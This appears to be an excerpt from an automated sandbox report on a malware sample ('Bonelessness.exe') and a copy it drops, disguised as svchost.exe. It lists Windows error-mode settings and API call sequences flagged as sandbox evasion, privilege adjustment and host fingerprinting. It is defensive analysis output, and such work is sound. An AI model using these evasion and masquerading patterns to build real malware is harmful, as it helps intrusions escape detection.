      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX

      Malware Analysis System Evasion

      barindex
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02D248C0 PathAddBackslashA,CreateFileA,SetFilePointer,SetFilePointer,LockFile,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetModuleFileNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetUserNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetEnvironmentVariableA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemDefaultLangID,memset,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDC,GetDeviceCaps,GetSystemMetrics,GetSystemMetrics,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDateFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeZoneInformation,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemWindowsDirectoryA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,IsUserAnAdmin,IsUserAnAdmin,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, mov dword ptr [ebp-20h], 00000419h 1_2_02D248C0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 5_2_028948C0 PathAddBackslashA,CreateFileA,SetFilePointer,SetFilePointer,LockFile,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetModuleFileNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetUserNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetEnvironmentVariableA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemDefaultLangID,memset,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDC,GetDeviceCaps,GetSystemMetrics,GetSystemMetrics,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDateFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeZoneInformation,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemWindowsDirectoryA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,#680,#680,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, mov dword ptr [ebp-20h], 00000419h 5_2_028948C0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 6_2_024448C0 PathAddBackslashA,CreateFileA,SetFilePointer,SetFilePointer,LockFile,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetModuleFileNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetUserNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetEnvironmentVariableA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemDefaultLangID,memset,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDC,GetDeviceCaps,GetSystemMetrics,GetSystemMetrics,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDateFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeZoneInformation,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemWindowsDirectoryA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,#680,#680,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, mov dword ptr [ebp-20h], 00000419h 6_2_024448C0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 8_2_012E48C0 PathAddBackslashA,CreateFileA,SetFilePointer,SetFilePointer,LockFile,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetModuleFileNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetUserNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetEnvironmentVariableA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemDefaultLangID,memset,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDC,GetDeviceCaps,GetSystemMetrics,GetSystemMetrics,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDateFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeZoneInformation,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemWindowsDirectoryA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,#680,#680,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, mov dword ptr [ebp-20h], 00000419h 8_2_012E48C0
      Source: C:\Users\user\Desktop\Bonelessness.exeCode function: GetModuleFileNameA,GetModuleFileNameA,strstr,strstr,GetUserNameA,CharUpperA,strstr,strstr,strstr,strstr,strstr,GetSystemWindowsDirectoryA,GetVolumeInformationA,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,0_2_00403920
      Source: C:\Users\user\Desktop\Bonelessness.exeCode function: EntryPoint,LoadLibraryA,GetModuleFileNameA,ExitProcess,FindWindowA,GetTickCount,PostMessageA,IsUserAnAdmin,IsUserAnAdmin,ExitProcess,IsUserAnAdmin,GetModuleHandleA,GetProcAddress,GetCurrentProcess,StrStrIA,GetCurrentProcessId,Sleep,StrStrIA,GlobalFindAtomA,GlobalAddAtomA,IsUserAnAdmin,GlobalFindAtomA,GlobalAddAtomA,IsUserAnAdmin,RtlAdjustPrivilege,IsUserAnAdmin,GlobalFindAtomA,GlobalAddAtomA,IsUserAnAdmin,RtlAdjustPrivilege,IsUserAnAdmin,ExitProcess,0_2_00402B70
      Source: C:\Windows\apppatch\svchost.exeCode function: GetModuleFileNameA,GetModuleFileNameA,strstr,strstr,GetUserNameA,CharUpperA,strstr,strstr,strstr,strstr,strstr,GetSystemWindowsDirectoryA,GetVolumeInformationA,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,1_2_00403920
      Source: C:\Windows\apppatch\svchost.exeCode function: EntryPoint,LoadLibraryA,GetModuleFileNameA,ExitProcess,FindWindowA,GetTickCount,PostMessageA,IsUserAnAdmin,IsUserAnAdmin,ExitProcess,IsUserAnAdmin,GetModuleHandleA,GetProcAddress,GetCurrentProcess,StrStrIA,GetCurrentProcessId,Sleep,StrStrIA,GlobalFindAtomA,GlobalAddAtomA,IsUserAnAdmin,GlobalFindAtomA,GlobalAddAtomA,IsUserAnAdmin,RtlAdjustPrivilege,IsUserAnAdmin,GlobalFindAtomA,GlobalAddAtomA,IsUserAnAdmin,RtlAdjustPrivilege,IsUserAnAdmin,ExitProcess,1_2_00402B70
      Source: C:\Windows\apppatch\svchost.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,InitializeCriticalSection,CreateThread,GetHandleInformation,FindCloseChangeNotification,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,1_2_02D367D0
      Source: C:\Windows\apppatch\svchost.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,memset,GetModuleFileNameA,AddVectoredExceptionHandler,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,InitializeCriticalSection,InitializeCriticalSection,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetUserObjectInformationA,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,LoadLibraryExA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,1_2_02D35230
      Source: C:\Windows\apppatch\svchost.exeCode function: FindWindowW,FindWindowW,Sleep,Sleep,FindWindowW,GetModuleFileNameA,StrStrIA,StrStrIA,PathFileExistsA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,StrStrIA,GetFileAttributesA,PathAddBackslashA,_snprintf,PathAddBackslashA,_snprintf,PathAddBackslashA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,1_2_02D43B90
      Source: C:\Windows\apppatch\svchost.exeCode function: GetUserNameA,memset,StrStrIA,1_2_02D3A8E0
      Source: C:\Windows\apppatch\svchost.exeCode function: GetModuleFileNameA,PathFindFileNameA,PathFileExistsA,StrStrIA,strstr,strstr,strstr,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,1_2_02D421E0
